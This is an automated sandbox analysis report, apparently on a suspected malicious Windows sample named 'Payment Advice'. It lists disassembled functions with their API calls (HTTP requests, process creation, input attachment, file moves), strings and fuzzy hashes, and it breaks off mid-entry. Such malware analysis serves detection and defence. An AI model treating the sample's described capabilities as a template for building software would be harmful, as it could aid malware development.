Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: e2d8c5532cadd76d98f838b4e092252c2455841f968142e2527b518a8129f876
Instruction ID: 3e92da6d9b8dd3d2d5f5d9c2e15769dc3ad2a689a16253018a1df73e8de9a46e
Opcode Fuzzy Hash: e2d8c5532cadd76d98f838b4e092252c2455841f968142e2527b518a8129f876
Instruction Fuzzy Hash: 4C21B274940105BFDB04ABA4CC85EFEBFB5BF45300F100115F951A72D1DBB558159B20

Function 005BB9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 005BBA73
GetDlgCtrlID.USER32 ref: 005BBA7E
GetParent.USER32 ref: 005BBA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 005BBA9D
GetDlgCtrlID.USER32(?), ref: 005BBAA6
GetParent.USER32(?), ref: 005BBAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 005BBAC5

Strings

ComboBox, xrefs: 005BB9FA
ListBox, xrefs: 005BBA32

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 349feb582f020a22ce363ba8733db382f79400adba7a080410936fb2ed3cfc5d
Instruction ID: 546e1ebc8f42f13d5eb2fb6ae9f47b4516f0b5bbffb463ad9ed966fd1f272733
Opcode Fuzzy Hash: 349feb582f020a22ce363ba8733db382f79400adba7a080410936fb2ed3cfc5d
Instruction Fuzzy Hash: EF21B0B5A40109BFDB01ABA4CC85EFEBFB9FF45300F100115F951A7191DBB559199B20

Function 005BBAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 005BBAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 005BBAF8
_wcscmp.LIBCMT ref: 005BBB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 005BBB85

Strings

largeicons, xrefs: 005BBB19
list, xrefs: 005BBB67
SHELLDLL_DefView, xrefs: 005BBB04
smallicons, xrefs: 005BBB4D
details, xrefs: 005BBB33

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 98692eeebd2b8c309ee23ec0f9d0ff3f3a4785c5fbb2b2e2d54417f1693d6991
Instruction ID: c593c247ec4e6cf04285aadfabdacc1bcdff2c6aaa8846457eaeba89671d1414
Opcode Fuzzy Hash: 98692eeebd2b8c309ee23ec0f9d0ff3f3a4785c5fbb2b2e2d54417f1693d6991
Instruction Fuzzy Hash: 60110276648307FFFA206620EC1ADEB3F9EBB52720F200022F904E50D9EFE2B8114558

Function 005DB2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005DB2D5
CoInitialize.OLE32(00000000), ref: 005DB302
CoUninitialize.OLE32 ref: 005DB30C
GetRunningObjectTable.OLE32(00000000,?), ref: 005DB40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 005DB539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 005DB56D
CoGetObject.OLE32(?,00000000,0060D91C,?), ref: 005DB590
SetErrorMode.KERNEL32(00000000), ref: 005DB5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 005DB623
VariantClear.OLEAUT32(0060D91C), ref: 005DB633

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 0f253a9c1431b85367265d8dfd8ec78481fbf75de51b9b32cd915ca39a9e5c1d
Instruction ID: ecb0b529e046bf240a53507814e0de1a8ba74690bb54e9dc4953f43a3096d0ed
Opcode Fuzzy Hash: 0f253a9c1431b85367265d8dfd8ec78481fbf75de51b9b32cd915ca39a9e5c1d
Instruction Fuzzy Hash: 93C1F171608301EFD710EF68C88496BBBEABF88344F05495EF98A9B251DB71ED05CB52

Function 005AACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 005AACC1

Part of subcall function 005A7CF4: __mtinitlocknum.LIBCMT ref: 005A7D06
Part of subcall function 005A7CF4: EnterCriticalSection.KERNEL32(00000000,?,005A7ADD,0000000D), ref: 005A7D1F

__calloc_crt.LIBCMT ref: 005AACD2

Part of subcall function 005A6986: __calloc_impl.LIBCMT ref: 005A6995
Part of subcall function 005A6986: Sleep.KERNEL32(00000000,000003BC,0059F507,?,0000000E), ref: 005A69AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 005AACED
GetStartupInfoW.KERNEL32(?,00636E28,00000064,005A5E91,00636C70,00000014), ref: 005AAD46
__calloc_crt.LIBCMT ref: 005AAD91
GetFileType.KERNEL32(00000001), ref: 005AADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 005AAE11

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: b28ae1463847c6d9af42755d8079cfe63a25e6d5798c7cd1a9a8acf4e3148b45
Instruction ID: 21713c56b8fafd1528ef50be62fe97bf66ab2cb82da0a1a7205ebcadeee435d0
Opcode Fuzzy Hash: b28ae1463847c6d9af42755d8079cfe63a25e6d5798c7cd1a9a8acf4e3148b45
Instruction Fuzzy Hash: 9A81DF709053568FDB24CF68C8845AEBFF5BF4B324B24526DE4A6AB3D1D7349802CB52

Function 005C4025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 005C4047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,005C30A5,?,00000001), ref: 005C405B
GetWindowThreadProcessId.USER32(00000000), ref: 005C4062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005C30A5,?,00000001), ref: 005C4071
GetWindowThreadProcessId.USER32(?,00000000), ref: 005C4083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,005C30A5,?,00000001), ref: 005C409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005C30A5,?,00000001), ref: 005C40AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,005C30A5,?,00000001), ref: 005C40F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,005C30A5,?,00000001), ref: 005C4108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,005C30A5,?,00000001), ref: 005C4113

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 2059b4b235aea700b8000f0671c54ba8dcff7eac9c28ec59ae2b24bdbe73f511
Instruction ID: cdc46eb9ac940f28caaa514ffbf55986989f344b255719ea6428762bfb8fa5a0
Opcode Fuzzy Hash: 2059b4b235aea700b8000f0671c54ba8dcff7eac9c28ec59ae2b24bdbe73f511
Instruction Fuzzy Hash: 0431A275540214AFDB10DF94DCAAF6A7BBBBB55311F149109FA04E6290CBB5DD80CF60

Function 005FDD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0059B496
SetTextColor.GDI32(?,000000FF), ref: 0059B4A0
SetBkMode.GDI32(?,00000001), ref: 0059B4B5
GetStockObject.GDI32(00000005), ref: 0059B4BD
GetClientRect.USER32(?), ref: 005FDD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 005FDD7A
GetWindowDC.USER32(?), ref: 005FDD86
GetPixel.GDI32(00000000,?,?), ref: 005FDD95
ReleaseDC.USER32(?,00000000), ref: 005FDDA7
GetSysColor.USER32(00000005), ref: 005FDDC5

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: f5ad80c9259552e26378e2cc7abb773883e27b0618df0a6d8d2e4d98ccfc9148
Instruction ID: a9a52966d669106d5ccd9cc82aa8aca118315560d6712485d7bba298cde4dcc2
Opcode Fuzzy Hash: f5ad80c9259552e26378e2cc7abb773883e27b0618df0a6d8d2e4d98ccfc9148
Instruction Fuzzy Hash: B0114C31580205AFEF216BA4EC08BAA7F77FB05325F109765FA6A950E1CB320951EB20

Function 00583093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 005830DC
CoUninitialize.OLE32(?,00000000), ref: 00583181
UnregisterHotKey.USER32(?), ref: 005832A9
DestroyWindow.USER32(?), ref: 005F5079
FreeLibrary.KERNEL32(?), ref: 005F50F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 005F5125

Strings

close all, xrefs: 005830D7

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 680926091b345ad3e224e2cdcde8d10943cf4624ce6c9be890fd070010adc43a
Instruction ID: e348447bf7b695523d0794bf64a868254bc5d183aa7d9f6fc8b1bf25c6a7c5db
Opcode Fuzzy Hash: 680926091b345ad3e224e2cdcde8d10943cf4624ce6c9be890fd070010adc43a
Instruction Fuzzy Hash: 49913B34200606CFC715FF24C899E69FBA8FF55704F5442A9E90AA7262DF34AE56CF50

Function 0059CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0059CC15

Part of subcall function 0059CCCD: GetClientRect.USER32(?,?), ref: 0059CCF6
Part of subcall function 0059CCCD: GetWindowRect.USER32(?,?), ref: 0059CD37
Part of subcall function 0059CCCD: ScreenToClient.USER32(?,?), ref: 0059CD5F

GetDC.USER32 ref: 005FD137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 005FD14A
SelectObject.GDI32(00000000,00000000), ref: 005FD158
SelectObject.GDI32(00000000,00000000), ref: 005FD16D
ReleaseDC.USER32(?,00000000), ref: 005FD175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 005FD200

Strings

U, xrefs: 005FD0D5

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: a54eb5063da459f8987e5d73dfce578f9192174fc814d1ae88444254681b97c6
Instruction ID: c786a61f5f84e63090e331b4adfddd6cb3f0882ab2461aec9a1861c1b62bcc15
Opcode Fuzzy Hash: a54eb5063da459f8987e5d73dfce578f9192174fc814d1ae88444254681b97c6
Instruction Fuzzy Hash: 0271BC35400209EFCF219F64C885ABA7FB6FF89310F144669EE555A2A6D7398C81DF60

Function 005EECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0059B34E: GetWindowLongW.USER32(?,000000EB), ref: 0059B35F

Part of subcall function 0059B63C: GetCursorPos.USER32(000000FF), ref: 0059B64F
Part of subcall function 0059B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0059B66C
Part of subcall function 0059B63C: GetAsyncKeyState.USER32(00000001), ref: 0059B691
Part of subcall function 0059B63C: GetAsyncKeyState.USER32(00000002), ref: 0059B69F

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 005EED3C
ImageList_EndDrag.COMCTL32 ref: 005EED42
ReleaseCapture.USER32 ref: 005EED48
SetWindowTextW.USER32(?,00000000), ref: 005EEDF0
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 005EEE03
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 005EEEDC

Strings

@GUI_DRAGFILE, xrefs: 005EEE77
@GUI_DROPID, xrefs: 005EEE33

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 6ae155c443904af04c2d2b95d98470aa194070d292d2c2cb8336d380d4a28f66
Instruction ID: dcc0415f9c906e8690637ac637b14c6f1212ca050171339dea81cf7d4f215ba4
Opcode Fuzzy Hash: 6ae155c443904af04c2d2b95d98470aa194070d292d2c2cb8336d380d4a28f66
Instruction Fuzzy Hash: B1519C74244340AFD714EF20DC5AF6A7BEAFB89304F104A1DF9959B2E1DB70A944CB52

Function 005D45C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005D45FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 005D462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 005D466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 005D4682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005D468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 005D46BF
InternetCloseHandle.WININET(00000000), ref: 005D4706

Part of subcall function 005D5052: GetLastError.KERNEL32(?,?,005D43CC,00000000,00000000,00000001), ref: 005D5067

Strings

, xrefs: 005D46B8

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: 580233357f1fdb51dd2e7f44acf5b560a8a1e0d168f04daa2915ade72b9d0e22
Instruction ID: e9dc6403bbc47cab412941b00e80906a09f3cfcc9d713642118b8680465176e4
Opcode Fuzzy Hash: 580233357f1fdb51dd2e7f44acf5b560a8a1e0d168f04daa2915ade72b9d0e22
Instruction Fuzzy Hash: 1F414DB1541205BFEB219F98CC89FBB7BADFF09354F004117FA069A281D7B0D9458BA4

Function 005DB644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0061DC00), ref: 005DB715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0061DC00), ref: 005DB749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 005DB8C1
SysFreeString.OLEAUT32(?), ref: 005DB8EB

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: a8259267f8d744301d7409557eadc41daf3ca348bd2d50fe212435f6b4623b0b
Instruction ID: 384073330f21f287329c77014f5ad2302d88fe7f389575d10edd4d097ac5ed04
Opcode Fuzzy Hash: a8259267f8d744301d7409557eadc41daf3ca348bd2d50fe212435f6b4623b0b
Instruction Fuzzy Hash: EDF13F75A00109EFDF14DF98C888EAEBBBAFF89315F11855AF905AB250DB31AD41CB50

Function 005E24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005E24F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 005E2688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 005E26AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005E26EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005E270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 005E286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 005E28A1
CloseHandle.KERNEL32(?), ref: 005E28D0
CloseHandle.KERNEL32(?), ref: 005E2947

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: a10d6d5775999c5dc292ae8161328a7852fc1181229dc5ca0f138cfbd252c086
Instruction ID: 2d3db3256a18c822e6e517773b2f9d32f6d120163034f3b646957a91169ab851
Opcode Fuzzy Hash: a10d6d5775999c5dc292ae8161328a7852fc1181229dc5ca0f138cfbd252c086
Instruction Fuzzy Hash: E3D1AD35604342DFCB18EF25C895A6ABFE5BF85310F18895DF8999B2A2DB30DC41CB52

Function 005EB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 005EB3F4

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: f8e3ef4f28f08ab3f9c81bf71b422a3ccb72df7cbe6f4b4fd5178c1ba9ccac37
Instruction ID: 5f22abb59ab9c60c7eaeb4549759963d63cd091b7ee712eca078060dc8032512
Opcode Fuzzy Hash: f8e3ef4f28f08ab3f9c81bf71b422a3ccb72df7cbe6f4b4fd5178c1ba9ccac37
Instruction Fuzzy Hash: CF51D530540285BBFF289F66DC8AB9F3F65BB05316F244512F6D4D61E1D771E9408B50

Function 0059A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 005FDB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 005FDB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 005FDB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 005FDB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 005FDB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0059A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 005FDBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 005FDBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0059A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 005FDBC8

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 331e41d415c45bb67aec0efceb73ef0b615800c36e612bf3182111c1d6b12094
Instruction ID: ab0e112c1914b202967ff81dfae91d5dc7664df614acea33ccb2af14ee088881
Opcode Fuzzy Hash: 331e41d415c45bb67aec0efceb73ef0b615800c36e612bf3182111c1d6b12094
Instruction Fuzzy Hash: 63517B30640209EFDF20DFA8CC86FAA7BB6FB49750F110618F94696290D774ED80DBA0

Function 005C7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 005C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005C5FA6,?), ref: 005C6ED8

Part of subcall function 005C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005C5FA6,?), ref: 005C6EF1

Part of subcall function 005C72CB: GetFileAttributesW.KERNEL32(?,005C6019), ref: 005C72CC

lstrcmpiW.KERNEL32(?,?), ref: 005C75CA
_wcscmp.LIBCMT ref: 005C75E2
MoveFileW.KERNEL32(?,?), ref: 005C75FB

Memory Dump Source

